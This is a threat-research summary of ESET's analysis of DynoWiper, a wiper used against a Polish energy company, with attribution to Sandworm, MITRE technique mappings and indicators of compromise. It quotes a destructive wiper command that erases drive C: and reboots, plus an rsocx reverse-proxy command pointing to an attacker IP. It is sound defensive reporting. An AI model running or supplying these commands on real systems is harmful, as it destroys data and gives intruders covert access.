Threat Research

DynoWiper update: Technical analysis and attribution

ESET-welivesecurity
DynoWiper update: Technical analysis and attribution

ESET researchers detailed DynoWiper, a new data-wiping malware deployed against an energy company in Poland that was prevented from fully executing by ESET PROTECT. The activity shows strong TTP overlap with previous Sandworm operations (including similarities to the ZOV wiper and AD/GPO deployment scripts), and ESET attributes DynoWiper to Sandworm with medium confidence. #DynoWiper #Sandworm

Keypoints

  • ESET discovered DynoWiper deployed at a Polish energy company on 2025-12-29; ESET PROTECT blocked execution and limited damage.
  • DynoWiper was deployed to a shared directory (C:inetpubpub) as schtask.exe, schtask2.exe, and _update.exe with successive rebuilds on the same day.
  • The wiper runs in three phases (recursive overwrite excluding specific directories, a second-phase sweep with different behaviors, and a forced reboot) and uses a 16-byte random buffer to overwrite files.
  • Attackers attempted to use tools like Rubeus and rsocx (SOCKS5 proxy) and tried LSASS dumping via Windows Task Manager prior to wiper deployment.
  • DynoWiper’s TTPs and deployment mechanisms closely resemble the ZOV wiper and Sandworm’s historical use of AD/GPO and custom PowerShell deployment scripts.
  • ESET attributes DynoWiper to the Russia-aligned Sandworm group with medium confidence, noting both supporting overlaps and contradicting factors (lack of visibility into initial access and some behavioral differences).

MITRE Techniques

  • [T1584.004 ] Compromise Infrastructure: Server – A likely compromised server was used to host a SOCKS5 server. (‘SOCKS5 server.’)
  • [T1059.001 ] Command and Scripting Interpreter: PowerShell – PowerShell scripts were used for deployment across domains and to distribute the wiper via Group Policy. (‘PowerShell scripts for deployment in the target organizations.’)
  • [T1059.003 ] Command and Scripting Interpreter: Windows Command Shell – The ZOV wiper runs shell commands to print time/version, erase C: and reboot the system. (‘time /t & ver & rmdir C: /s /q && dir && shutdown /r’)
  • [T1053.005 ] Scheduled Task/Job: Scheduled Task – Both the ZOV wiper and DynoWiper are executed using Windows scheduled tasks in observed incidents. (‘The ZOV wiper and DynoWiper are executed using Windows scheduled tasks.’)
  • [T1003.001 ] OS Credential Dumping: LSASS Memory – Attackers attempted to dump LSASS process memory as part of credential access activities. (‘attempted to dump the LSASS process using Windows Task Manager.’)
  • [T1083 ] File and Directory Discovery – The wipers enumerate files and directories across fixed and removable drives to identify targets for wiping. (‘search for files and directories in order to wipe them.’)
  • [T1680 ] Local Storage Discovery – The malware identifies additional disks present on the system to expand the wiping scope. (‘identify additional disks present on the system to subsequently wipe data on them.’)
  • [T1082 ] System Information Discovery – The ZOV sample prints Windows version information during its execution. (‘prints the Windows version of the running system.’)
  • [T1124 ] System Time Discovery – The ZOV sample prints the local system time as part of its reporting. (‘prints current local time.’)
  • [T1105 ] Ingress Tool Transfer – Attackers attempted to download publicly available tooling such as Rubeus and rsocx into the target environment. (‘The attackers tried to download Rubeus and rsocx in the target organization.’)
  • [T1090.002 ] Proxy: External Proxy – The adversary attempted to establish a reverse connection to an external SOCKS5 proxy using rsocx. (‘C:UsersDownloadsr.exe -r 31.172.71[.]5:8008’)
  • [T1561.001 ] Disk Wipe: Disk Content Wipe – Both ZOV and DynoWiper overwrite file contents (full overwrite for small files, partial for large files) as their primary destructive action. (‘overwrite contents of files.’)
  • [T1529 ] System Shutdown/Reboot – After wiping activity, the malware forces a system reboot to complete destruction. (‘reboot the system after the wiping process is complete.’)

Indicators of Compromise

  • [SHA-1 ] Wiper and tool samples – 472CA448F82A7FF6F373A32FDB9586FD7C38B631 (ZOV wiper), 4EC3C90846AF6B79EE1A5188EEFA3FD21F6D4CF6 (_update.exe / DynoWiper), and 5 more hashes.
  • [Filename ] Deployed binaries and wiper filenames – schtask.exe, schtask2.exe, _update.exe (deployed to C:inetpubpub).
  • [Filename ] Tooling used in the intrusion – Rubeus.exe (Kerberos tool), rsocx.exe (SOCKS5 proxy tool used for external proxying).
  • [File path ] Observed deployment and download locations – C:inetpubpub (wiper deployment directory), C:UsersDownloadsrubeus.exe (attempted tool download).
  • [IP ] SOCKS5 proxy server – 31.172.71[.]5 (Fornex Hosting S.L.; used as the rsocx reverse-connect endpoint).
  • [Domain ] Likely abused/compromised host – progamevl[.]ru (associated with the SOCKS5 server used in the operation).

Read more: https://www.welivesecurity.com/en/eset-research/dynowiper-update-technical-analysis-attribution/